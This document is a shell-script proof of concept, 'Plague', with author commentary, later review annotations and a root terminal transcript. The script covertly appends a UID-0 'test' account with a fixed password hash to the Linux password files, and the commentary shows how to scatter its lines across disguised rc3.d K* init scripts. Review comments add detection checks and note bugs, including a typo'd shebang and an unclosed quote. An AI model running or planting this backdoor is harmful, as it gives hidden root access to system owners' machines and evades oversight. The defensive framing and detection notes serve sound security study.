#!/bin.sh
# Plague Proof of Concept
# J. Oquendo
# echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'
# places an account called test with the
# password test on a machine
# Scripted for Linux as a Proof of Concept
# easily modified for any nix distro
# (BSD, Solaris, QNX, etc)

# ---- Linux ----
# NOTE(review): the shebang on line 1 reads "#!/bin.sh" (a typo for /bin/sh),
# so the file as published will not execute directly; the transcript below runs
# it as ./plague, so presumably a corrected copy was used.
#
# Resolve the target path indirectly, so that neither "/etc/passwd" nor
# "/etc/shadow" appears literally in the script: take line 59 of
# /usr/include/paths.h, strip the double quotes, keep the third field.
# Nothing validates the result. The line number is tied to one glibc release;
# on any other release $file is whatever sits on that line, or empty, which
# turns ">> $file" into a redirect error and "sed -n '1p' $file" into a read
# from stdin. The transcript (the "test" entry carrying the hash shows up in
# /etc/shadow) suggests this resolves to /etc/shadow on the author's machine --
# verify against your own headers before trusting that.
file=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
# Take the FIRST line of $file (root's entry on the machine in the transcript)
# and rewrite it with three awk rules: set field 1 to "test"; (pattern "1")
# set field 2 to a fixed md5crypt ($1$) hash, password "test" per the header;
# (pattern "2") print the record. One line is appended, with root's aging
# fields (13428:0:99999:7:::) copied verbatim.
# The salt and hash are constants, so every deployment shares them:
#   grep -F 'N6M3yuA9' /etc/shadow
# is a one-line indicator for this particular PoC.
sed -n '1p' $file|awk -F ":" 'BEGIN{OFS=":"}{$1="test"}1{$2="\$1\$N6M3yuA9\$JXTgD8q8apf1fgfUT44hW1"}2' >> $file
# Same indirection via line 74 of /usr/include/sysexits.h (commas stripped,
# eighth field); per the transcript this ends up pointing at /etc/passwd.
file2=`awk 'NR==74 {gsub(/,/,"");print $8}' /usr/include/sysexits.h`
# Copy the first line of $file2 with only the name field replaced by "test".
# Every other field is root's -- UID 0, GID 0, /root, /bin/bash -- which is the
# "test:x:0:0:root:/root:/bin/bash" entry the transcript shows appended.
# Defender's check: a second UID-0 account, appended at the END of the file,
# is the tell; useradd is never invoked, so do not expect the usual syslog
# trace of an account being created:
#   awk -F: '$3==0 && $1!="root"' /etc/passwd
#   pwck -r
# Beyond that, only an integrity baseline (or an audit watch on /etc/passwd
# and /etc/shadow) would surface the change.
sed -n '1p' $file2|sed 's/[^:]*:/test:/' >> $file2

# FreeBSD

# Same indirection: line 71 of /usr/include/pwd.h, quotes stripped, third
# field. Presumably this yields /etc/master.passwd on the FreeBSD release the
# author looked at -- as with the Linux branch, verify, since the line number
# is the only thing tying it to a path and the value is used unchecked.
file=`awk 'NR==71 {gsub(/"/,"");print $3}' /usr/include/pwd.h`
# Rewrite EVERY record of $file (name -> "test", password -> the fixed
# md5crypt hash for "test"), keep only the third line of that output, and
# append it. So the new entry clones whatever the third line of the file
# was, not root's; the choice of 3 presumably skips header comment lines,
# which the script does not verify. As the commented-out block below
# (pwd_mkdb) concedes, this append alone presumably does not yield a usable
# login until the password databases are rebuilt.
awk -F ":" 'BEGIN{OFS=":"}{$1="test"}1{$2="\$1\$N6M3yuA9\$JXTgD8q8apf1fgfUT44hW1"}2' $file|sed -n '3p' >> $file

# blah blah blah ...

# file2=`awk 'NR==69 {gsub(/,/,"");print $8}' /usr/include/pwd.h`
# sed -n '1p' $file2|sed 's/[^:]*:/test:/' >> $file2
# Yes I know... /usr/sbin/pwd_mkdb -p /etc/master.passwd .. boohoo
# fix=`awk 'NR==79 {gsub(/"/,"");print $3}' /usr/include/pwd.h`
# up=`awk 'NR==71 {gsub(/"/,"");print $3}' /usr/include/pwd.h`
# $fix -p $up 

# Too bored to continue with the concept. If you don't get it, you don't get it.


# Solaris... You finish the rest of the work...
# Left unfinished by the author: both variables below are assigned and never
# used in the visible script.
# Path derived from line 41 of /usr/include/newt.h: third field, the trailing
# "Fg," removed and "/etc/" prepended. newt.h is the header of the newt
# text-UI library rather than a base-system header, so this presumably only
# resolves where newt's development headers are installed -- verify. Nothing
# checks the result.
file=`sed -n '41p' /usr/include/newt.h |awk '{print $3}'|sed 's/Fg,//g;s/^/\/etc\//g'`
# Path from line 57 of /usr/include/unistd.h, third field, quotes stripped.
# Same caveat: tied to one header revision, unchecked.
file2=`sed -n '57p' /usr/include/unistd.h|awk '{print $3}'|sed 's/"//g'`

.......................................................

Plague is an odd proof-of-concept backdoor-keeping tool based on the premise of using existing system files and
commands to install and maintain a backdoor on Linux systems. I could have modified this for BSD, Solaris, etc.,
but I didn't feel like doing that much work. Besides, it's conceptual.


The purpose behind it was to give security engineers a glimpse of what a backdoor could look like if done
carefully, and how difficult it would be to detect. Only four lines in this shell script add an account to the
system. To an untrained *nix admin these commands may be overlooked as unobtrusive: they name neither useradd
nor /etc/passwd or /etc/shadow, because the paths are pulled out of system headers at run time.

Imagine portions of this scattered throughout system scripts and assembled at the end (something like Voltron)
to run on either startup or shutdown...

Sure, you would see the account in /etc/passwd, but unless you dissect your machine and are CONSTANTLY running
something like Tripwire, something like this would be a nightmare. For you Linux users using yum, apt-get,
etc., how often do you re-verify your checksums?

Example: the script split across several files named like the predefined K* scripts in /etc/rc3.d/

# Each echo writes one line of the PoC into a separate K* file; the pieces are
# meant to be concatenated and run later. Things to know before reading it as
# working code:
#  - the K2 line does not parse as printed: after `>> $file"` there is a stray
#    `>>"` that opens a quote which is never closed.
#  - the backticks inside double quotes on the K1 and K3 lines run awk NOW, so
#    those K files receive the already-resolved path, not the awk command
#    (only \$3 / \$8 are escaped, to keep awk's field references intact).
#    Unlike line 13 of the script, the K3 variant does not strip commas.
#  - `>> $file` / `>> $file2` on the K2 and K4 lines are not escaped either,
#    so they expand when the echo runs (to empty unless already set here).
#  - `$file1` on the K5 line is never assigned anywhere; the variable is `file`.
echo "file=`awk 'NR==59 {gsub(/"/,"");print \$3}' /usr/include/paths.h`" >>  K1firstfile
echo "sed -n '1p' \$file|sed 's/[^:]*:/new_account_name:/' >> $file"  >>"  >>  K2nextfile
echo "file2=`awk 'NR==74 {print \$8}' /usr/include/sysexits.h`" >> K3anotherfile
echo "sed -n '1p' \$file2|sed 's/[^:]*:/new_account_name:/'' >> $file2" >> K4endingfile
echo "rm $file1 $file2" >> K5lastfileremove

Each line is placed in its own file, in execution order; at the end the pieces are reassembled, run, then deleted...
awk was too long and, to me, a bit more obvious than sed... And yes, I could have made the one-liner shorter had
I wanted to.

But what about the hash in /etc/shadow? Simple...

# Standalone form of the shadow transform: for every colon-separated record on
# stdin, set field 1 to "new_account_name" and field 2 to the fixed md5crypt
# hash (password "test" per the script header), then print it. It only filters
# stdin -- feeding it one shadow line and appending the output to /etc/shadow
# is what creates the entry. Because the salt is hard-coded,
# `grep -F 'N6M3yuA9' /etc/shadow` flags any copy of this PoC.
awk -F ":" 'BEGIN{OFS=":"}{$1="new_account_name"}1{$2="\$1\$N6M3yuA9\$JXTgD8q8apf1fgfUT44hW1"}2'
This rewrites the username field of whatever shadow line it is fed to "new_account_name" and the password field to the hash of "test"; appended to /etc/shadow, that line is the new account's shadow entry.

Here is the before and after on a Scientific Linux machine

[root@armada ~]# uname -a
Linux armada.disgraced.org 2.6.9-34.EL #1 Mon Mar 13 11:31:17 CST 2006 i686 athlon i386 GNU/Linux
[root@armada ~]# 
[root@armada ~]# cat /etc/shadow
root://////////:13428:0:99999:7:::
bin:*:13428:0:99999:7:::
daemon:*:13428:0:99999:7:::
adm:*:13428:0:99999:7:::
lp:*:13428:0:99999:7:::
sync:*:13428:0:99999:7:::
shutdown:*:13428:0:99999:7:::
halt:*:13428:0:99999:7:::
mail:*:13428:0:99999:7:::
news:*:13428:0:99999:7:::
uucp:*:13428:0:99999:7:::
operator:*:13428:0:99999:7:::
games:*:13428:0:99999:7:::
gopher:*:13428:0:99999:7:::
ftp:*:13428:0:99999:7:::
nobody:*:13428:0:99999:7:::
dbus:!!:13428:0:99999:7:::
vcsa:!!:13428:0:99999:7:::
rpm:!!:13428:0:99999:7:::
haldaemon:!!:13428:0:99999:7:::
netdump:!!:13428:0:99999:7:::
nscd:!!:13428:0:99999:7:::
sshd:!!:13428:0:99999:7:::
rpc:!!:13428:0:99999:7:::
mailnull:!!:13428:0:99999:7:::
smmsp:!!:13428:0:99999:7:::
rpcuser:!!:13428:0:99999:7:::
nfsnobody:!!:13428:0:99999:7:::
pcap:!!:13428:0:99999:7:::
apache:!!:13428:0:99999:7:::
squid:!!:13428:0:99999:7:::
webalizer:!!:13428:0:99999:7:::
xfs:!!:13428:0:99999:7:::
ntp:!!:13428:0:99999:7:::
gdm:!!:13428:0:99999:7:::
quagga:!!:13428:0:99999:7:::
dovecot:!!:13428:0:99999:7:::
postfix:!!:13428:0:99999:7:::
mysql:!!:13428:0:99999:7:::
sil:!!:13428:0:99999:7:::
nagios:!!:13430:0:99999:7:::
luzer:!!:13437:0:99999:7:::
zenoss:!!:13438:0:99999:7:::
[root@armada ~]# 
[root@armada ~]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
quagga:x:92:92:Quagga routing suite:/var/run/quagga:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
sil:x:500:500:Loser:/home/sil:/bin/bash
nagios:x:501:501::/home/nagios:/bin/bash
alanr:x:502:502::/home/alanr:/bin/bash
luzer:x:503:503::/home/luzer:/bin/bash
zenoss:x:504:504::/home/zenoss:/bin/bash
[root@armada ~]# ./plague
[root@armada ~]# 
[root@armada ~]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
quagga:x:92:92:Quagga routing suite:/var/run/quagga:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
sil:x:500:500:Loser:/home/sil:/bin/bash
nagios:x:501:501::/home/nagios:/bin/bash
alanr:x:502:502::/home/alanr:/bin/bash
luzer:x:503:503::/home/luzer:/bin/bash
zenoss:x:504:504::/home/zenoss:/bin/bash
test:x:0:0:root:/root:/bin/bash
[root@armada ~]# 
[root@armada ~]# cat /etc/shadow
root://////////:13428:0:99999:7:::
bin:*:13428:0:99999:7:::
daemon:*:13428:0:99999:7:::
adm:*:13428:0:99999:7:::
lp:*:13428:0:99999:7:::
sync:*:13428:0:99999:7:::
shutdown:*:13428:0:99999:7:::
halt:*:13428:0:99999:7:::
mail:*:13428:0:99999:7:::
news:*:13428:0:99999:7:::
uucp:*:13428:0:99999:7:::
operator:*:13428:0:99999:7:::
games:*:13428:0:99999:7:::
gopher:*:13428:0:99999:7:::
ftp:*:13428:0:99999:7:::
nobody:*:13428:0:99999:7:::
dbus:!!:13428:0:99999:7:::
vcsa:!!:13428:0:99999:7:::
rpm:!!:13428:0:99999:7:::
haldaemon:!!:13428:0:99999:7:::
netdump:!!:13428:0:99999:7:::
nscd:!!:13428:0:99999:7:::
sshd:!!:13428:0:99999:7:::
rpc:!!:13428:0:99999:7:::
mailnull:!!:13428:0:99999:7:::
smmsp:!!:13428:0:99999:7:::
rpcuser:!!:13428:0:99999:7:::
nfsnobody:!!:13428:0:99999:7:::
pcap:!!:13428:0:99999:7:::
apache:!!:13428:0:99999:7:::
squid:!!:13428:0:99999:7:::
webalizer:!!:13428:0:99999:7:::
xfs:!!:13428:0:99999:7:::
ntp:!!:13428:0:99999:7:::
gdm:!!:13428:0:99999:7:::
quagga:!!:13428:0:99999:7:::
dovecot:!!:13428:0:99999:7:::
postfix:!!:13428:0:99999:7:::
mysql:!!:13428:0:99999:7:::
sil:!!:13428:0:99999:7:::
nagios:!!:13430:0:99999:7:::
luzer:!!:13437:0:99999:7:::
zenoss:!!:13438:0:99999:7:::
test:$1$N6M3yuA9$JXTgD8q8apf1fgfUT44hW1:13428:0:99999:7:::